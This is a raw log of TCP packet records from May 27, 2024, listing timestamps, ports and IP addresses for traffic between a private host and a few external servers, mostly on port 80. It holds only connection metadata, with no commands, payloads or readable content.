May 27, 2024 18:35:15.506814957 CEST	49165	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:15.506866932 CEST	49165	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:15.508492947 CEST	49165	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:15.508519888 CEST	49165	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:15.511158943 CEST	80	49165	54.241.153.192	192.168.2.22
May 27, 2024 18:35:15.511221886 CEST	49165	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:15.511229992 CEST	80	49165	54.241.153.192	192.168.2.22
May 27, 2024 18:35:15.511329889 CEST	49165	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:15.511382103 CEST	80	49165	54.241.153.192	192.168.2.22
May 27, 2024 18:35:15.511493921 CEST	49165	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:15.615664959 CEST	49166	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:15.620579004 CEST	80	49166	54.241.153.192	192.168.2.22
May 27, 2024 18:35:15.620670080 CEST	49166	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:15.620872021 CEST	49166	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:15.625715017 CEST	80	49166	54.241.153.192	192.168.2.22
May 27, 2024 18:35:16.201503038 CEST	80	49166	54.241.153.192	192.168.2.22
May 27, 2024 18:35:16.211870909 CEST	49167	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:16.216814995 CEST	80	49167	198.46.177.156	192.168.2.22
May 27, 2024 18:35:16.216897964 CEST	49167	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:16.216969967 CEST	49167	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:16.221927881 CEST	80	49167	198.46.177.156	192.168.2.22
May 27, 2024 18:35:16.327415943 CEST	80	49161	54.241.153.192	192.168.2.22
May 27, 2024 18:35:16.327599049 CEST	49161	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:16.401031017 CEST	49166	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:16.738387108 CEST	80	49167	198.46.177.156	192.168.2.22
May 27, 2024 18:35:16.947164059 CEST	49167	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:16.951937914 CEST	80	49167	198.46.177.156	192.168.2.22
May 27, 2024 18:35:16.952050924 CEST	49167	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:17.024652004 CEST	80	49162	198.46.177.156	192.168.2.22
May 27, 2024 18:35:17.024713039 CEST	49162	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:20.022763014 CEST	49168	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:20.027672052 CEST	80	49168	54.241.153.192	192.168.2.22
May 27, 2024 18:35:20.027754068 CEST	49168	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:20.027926922 CEST	49168	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:20.032732964 CEST	80	49168	54.241.153.192	192.168.2.22
May 27, 2024 18:35:20.640238047 CEST	80	49168	54.241.153.192	192.168.2.22
May 27, 2024 18:35:20.640661001 CEST	80	49168	54.241.153.192	192.168.2.22
May 27, 2024 18:35:20.640697956 CEST	80	49168	54.241.153.192	192.168.2.22
May 27, 2024 18:35:20.640717983 CEST	49168	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:20.640733957 CEST	80	49168	54.241.153.192	192.168.2.22
May 27, 2024 18:35:20.640779972 CEST	49168	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:20.640830994 CEST	80	49168	54.241.153.192	192.168.2.22
May 27, 2024 18:35:20.640986919 CEST	80	49168	54.241.153.192	192.168.2.22
May 27, 2024 18:35:20.641022921 CEST	80	49168	54.241.153.192	192.168.2.22
May 27, 2024 18:35:20.641041040 CEST	49168	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:20.641057014 CEST	80	49168	54.241.153.192	192.168.2.22
May 27, 2024 18:35:20.641091108 CEST	80	49168	54.241.153.192	192.168.2.22
May 27, 2024 18:35:20.641113043 CEST	49168	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:20.641304016 CEST	80	49168	54.241.153.192	192.168.2.22
May 27, 2024 18:35:20.641352892 CEST	49168	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:20.641407013 CEST	49168	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:20.646074057 CEST	80	49168	54.241.153.192	192.168.2.22
May 27, 2024 18:35:20.646119118 CEST	80	49168	54.241.153.192	192.168.2.22
May 27, 2024 18:35:20.646140099 CEST	49168	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:20.646168947 CEST	49168	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:20.769401073 CEST	49169	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:20.774405956 CEST	80	49169	54.241.153.192	192.168.2.22
May 27, 2024 18:35:20.774493933 CEST	49169	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:20.774620056 CEST	49169	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:20.779581070 CEST	80	49169	54.241.153.192	192.168.2.22
May 27, 2024 18:35:21.205290079 CEST	80	49166	54.241.153.192	192.168.2.22
May 27, 2024 18:35:21.205369949 CEST	49166	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:21.205534935 CEST	49166	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:21.210393906 CEST	80	49166	54.241.153.192	192.168.2.22
May 27, 2024 18:35:21.392816067 CEST	80	49169	54.241.153.192	192.168.2.22
May 27, 2024 18:35:21.392888069 CEST	49169	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:21.396075964 CEST	49170	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:21.401000977 CEST	80	49170	198.46.177.156	192.168.2.22
May 27, 2024 18:35:21.401061058 CEST	49170	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:21.401210070 CEST	49170	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:21.409548044 CEST	80	49170	198.46.177.156	192.168.2.22
May 27, 2024 18:35:21.751203060 CEST	80	49167	198.46.177.156	192.168.2.22
May 27, 2024 18:35:21.751305103 CEST	49167	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:21.884505987 CEST	49167	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:21.889501095 CEST	80	49167	198.46.177.156	192.168.2.22
May 27, 2024 18:35:21.891515017 CEST	80	49170	198.46.177.156	192.168.2.22
May 27, 2024 18:35:21.891587019 CEST	49170	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:24.876593113 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:24.883270979 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:24.883356094 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:24.885535955 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:24.891175032 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.433310032 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.433356047 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.433393002 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.433427095 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.433460951 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.433495998 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.433528900 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.433554888 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.433562994 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.433556080 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.433556080 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.433595896 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.433634043 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.433634043 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.433634043 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.433660030 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.433702946 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.438817978 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.438853025 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.438874960 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.438888073 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.438894987 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.438931942 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.525866985 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.525917053 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.525945902 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.526104927 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.526175022 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.526182890 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.526175022 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.526220083 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.526242971 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.526262045 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.526350975 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.526412010 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.526858091 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.526906013 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.526932001 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.526968956 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.526979923 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.527019978 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.527096033 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.527143002 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.527720928 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.527791977 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.527817965 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.527853966 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.527884007 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.527905941 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.527946949 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.527992964 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.528558969 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.528613091 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.528661013 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.528697014 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.528708935 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.528748035 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.528800011 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.528858900 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.529459000 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.529510021 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.529515028 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.529548883 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.529562950 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.529594898 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.529656887 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.529706955 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.531135082 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.531168938 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.531192064 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.531223059 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.618582010 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.618622065 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.618638992 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.618772030 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.618777990 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.618796110 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.618815899 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.618828058 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.618911982 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.618928909 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.618959904 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.619292021 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.619333029 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.619394064 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.619410992 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.619432926 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.619446039 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.619532108 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.619570017 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.619661093 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.619677067 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.619693995 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.619699001 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.619710922 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.619714022 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.619726896 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.619740963 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.620028973 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.620045900 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.620063066 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.620068073 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.620081902 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.620095015 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.620229959 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.620269060 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.620299101 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.620315075 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.620331049 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.620337009 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.620356083 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.620364904 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.620697975 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.620713949 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.620732069 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.620738983 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.620748997 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.620750904 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.620764971 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.620765924 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.620779037 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.620783091 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.620796919 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.620800018 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.620814085 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.620829105 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.621221066 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.621260881 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.621328115 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.621345043 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.621366978 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.621387005 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.621551991 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.621567965 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.621584892 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.621591091 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.621601105 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.621604919 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.621619940 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.621633053 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.621817112 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.621855974 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.711373091 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.711401939 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.711442947 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.711462975 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.711468935 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.711493969 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.711594105 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.711608887 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.711625099 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.711635113 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.711658001 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.711807013 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.711847067 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.711918116 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.711932898 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.711947918 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.711957932 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.711971998 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.712109089 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.712146044 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.712213039 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.712229013 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.712250948 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.712264061 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.712438107 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.712452888 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.712467909 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.712476969 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.712483883 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.712491035 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.712507010 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.712519884 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.712709904 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.712754011 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.712831974 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.712846994 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.712862015 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.712871075 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.712877035 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.712884903 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.712893009 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.712899923 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.712908030 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.712913036 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.712927103 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.712939978 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.713330030 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.713345051 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.713361025 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.713373899 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.713376045 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.713390112 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.713408947 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.713644028 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.713659048 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.713673115 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.713685989 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.713687897 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.713701010 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.713716030 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.714036942 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.714051962 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.714066029 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.714076042 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.714082003 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.714090109 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.714102983 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.714106083 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.714118958 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.714121103 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.714133978 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.714137077 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.714149952 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.714164972 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.714587927 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.714632034 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.714678049 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.714694023 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.714715958 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.714730024 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.714894056 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.714909077 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.714922905 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.714935064 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.714937925 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.714948893 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.714965105 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.715245008 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.715259075 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.715272903 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.715285063 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.715287924 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.715317965 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.715332985 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.715573072 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.715586901 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.715615988 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.804311991 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.804394007 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.804409981 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.804425955 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.804442883 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.804449081 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.804460049 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.804462910 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.804474115 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.804490089 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.804626942 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.804642916 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.804660082 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.804667950 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.804676056 CEST	80	49171	198.46.177.156	192.168.2.22
May 27, 2024 18:35:25.804681063 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.804694891 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:25.804709911 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:26.394038916 CEST	80	49169	54.241.153.192	192.168.2.22
May 27, 2024 18:35:26.395467043 CEST	49169	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:26.447334051 CEST	49172	443	192.168.2.22	188.114.96.3
May 27, 2024 18:35:26.447370052 CEST	443	49172	188.114.96.3	192.168.2.22
May 27, 2024 18:35:26.447457075 CEST	49172	443	192.168.2.22	188.114.96.3
May 27, 2024 18:35:26.460031033 CEST	49172	443	192.168.2.22	188.114.96.3
May 27, 2024 18:35:26.460047007 CEST	443	49172	188.114.96.3	192.168.2.22
May 27, 2024 18:35:26.678025961 CEST	49171	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:26.893778086 CEST	80	49170	198.46.177.156	192.168.2.22
